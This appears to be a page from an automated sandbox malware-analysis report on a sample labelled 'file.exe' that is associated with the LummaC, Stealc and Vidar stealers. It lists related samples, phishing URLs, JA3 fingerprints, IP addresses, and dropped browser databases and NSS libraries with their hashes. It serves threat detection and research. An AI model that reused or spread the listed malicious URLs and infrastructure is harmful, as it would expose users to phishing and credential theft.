	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	87.120.125.16
	file.exe	Get hash	malicious	Unknown	Browse	87.120.125.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	23.1.237.91
	Voicemail_+Transcription003593.docx	Get hash	malicious	Tycoon2FA	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.1.237.91
	https://mikkymax.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	http://junocis.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://eu-central-1.protection.sophos.com/?d=xxxlgroup.com&u=aHR0cHM6Ly9zZXJ2aWNlcy5pc3QueHh4bGdyb3VwLmNvbS9QYXltZW50U2VydmljZS8xNy8wWi8wMDAxYzk5YzBhYzVjMGUzMDAwMDNmMzgwMDAwODkxODE0Nzk3NWMy&i=NWM0YWFhZTFlYmMxMjgxMzI2Mzk1MmZj&t=UjJrRmV2QXpnYUF0RUsvV3haZ0lQMllKYVZRbjFESmtncHdLSjlTVGFWST0=&h=30d9cb4dc2a54dd59052f7a4a0edde4a&s=AVNPUEhUT0NFTkNSWVBUSVYENbLvm6o_1YsgOojZ1VDNrB0gxZ-tcqRfXFH68hrgRw	Get hash	malicious	Unknown	Browse	23.1.237.91
	Malicious PDF.pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	Salary Amendment.xlsx	Get hash	malicious	Unknown	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	https://bio.to/Q6knqu	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	https://pthn.airrcofvbc.com/YReXjN/#<EMAIL&gt	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Play_VM-Now(Jwright)CQDM.html	Get hash	malicious	HTMLPhisher	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Play_VM-Now(Bfassl)CLQD.html	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Play_VM-Now(Difioreconstruction)CLQD.html	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Voicemail_+Transcription003593.docx	Get hash	malicious	Tycoon2FA	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
	Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdf	Get hash	malicious	Unknown	Browse	40.126.32.76 4.245.163.56 184.28.90.27 13.107.246.45
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC	Browse	40.115.3.253 40.113.103.199
	Play_VM-Now(Bfassl)CLQD.html	Get hash	malicious	Unknown	Browse	40.115.3.253 40.113.103.199
	Play_VM-Now(Difioreconstruction)CLQD.html	Get hash	malicious	Unknown	Browse	40.115.3.253 40.113.103.199
	file.exe	Get hash	malicious	LummaC	Browse	40.115.3.253 40.113.103.199
	Support.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse	40.115.3.253 40.113.103.199
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	40.115.3.253 40.113.103.199
	Support.Client (1).exe	Get hash	malicious	ScreenConnect Tool	Browse	40.115.3.253 40.113.103.199
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	40.115.3.253 40.113.103.199
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	40.115.3.253 40.113.103.199
	Factura de proforma.exe	Get hash	malicious	AgentTesla	Browse	40.115.3.253 40.113.103.199
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	medk.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	20.189.173.17 172.67.174.133
	tab.dll.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	20.189.173.17 172.67.174.133
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	20.189.173.17 172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	ASmartService.exe	Get hash	malicious	LummaC	Browse	20.189.173.17 172.67.174.133
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	20.189.173.17 172.67.174.133

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CBAEHCAEGDHJKFHJKFIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFIEHCFIECBGCBFHIJJKEGHIEC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBKEHJEGCFBFHJJKJEHDHIDBKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAFIJDGHCBFHJKFCGIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HIEHDHCF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJDGIIDHJEBGIDHJJDBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFIJEGCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2645845045424058
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMLSAELyKOMq+8yC8F/YfU5m+OlTLVumO:Bq+n0JL9ELyKOMq+8y9/OwN
MD5:	8339C8DAA3882DF85F773A570625824E
SHA1:	2D1DE51BC34E2BA31ADA9246F5F52C7C0E5283B2
SHA-256:	22339632CE47F7198FC63AFC153CE047A5767B2E967551B64E17CDE8779AA469
SHA-512:	CED81F1D902DC177B8D34AC37C03DC25F1E21EC89E4377E9086473CDC0DEFA6C9B3D99389E496A059D196912369B0D5239D03441350C6B248D1D7985C9934BAF
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ea44ea94c2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\522f52bd-2caf-44cd-b12a-d8b42e9fb70d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44682
Entropy (8bit):	6.095122740550936
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBDwuwhDO6vP6ONl11PqvLiPycGoup1Xl3jVzXr4CW:z/Ps+wsI7yOEJ6tlqchu3VlXr4CRo1
MD5:	D8288AA0263A8C0FDD31CFF40A468CFC
SHA1:	86CC427873A2B5B21D2A8F20DEC8A3AFB9AB3259
SHA-256:	5BF5AD4E33BAC7C82FD9E386A1261BDD664B83E8BA0DA0B8239E44D529597541
SHA-512:	ADEB295B05D4C662E0B1C6CAAFDB17E126C068F77F76582E93E08917FC6CB9B42F97B417F3ED7D868B730809D13B7E7D87C08B250C2647F81193F2E34A3B3F4E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\65d815b3-1b39-4f27-a5f3-3400fa574fdc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726580610927
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMWwuF9hDO6vP6O+/tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Stbz8hu3VlXr4CRo1
MD5:	041E41530EB800BD60DC720B114C723A
SHA1:	79D96B00B4D90BB3BB078705B95D37FED7ACE751
SHA-256:	FF687872F0B0B1253D3A81420CF0A4973573B87BCBA3E97B04E93410A181690E
SHA-512:	04C9F53FDD3512A44A8B691D1ABAE7D4239131F1CE77D972FFAABF71010E5EB4380E627CF7D271BE0228CBF57EAAF28BE3F8F05335F93166C8B2E09967BFC615
Malicious:	false
